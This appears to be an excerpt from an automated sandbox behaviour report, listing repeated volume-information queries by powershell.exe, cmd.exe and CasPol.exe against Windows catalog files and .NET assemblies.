Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
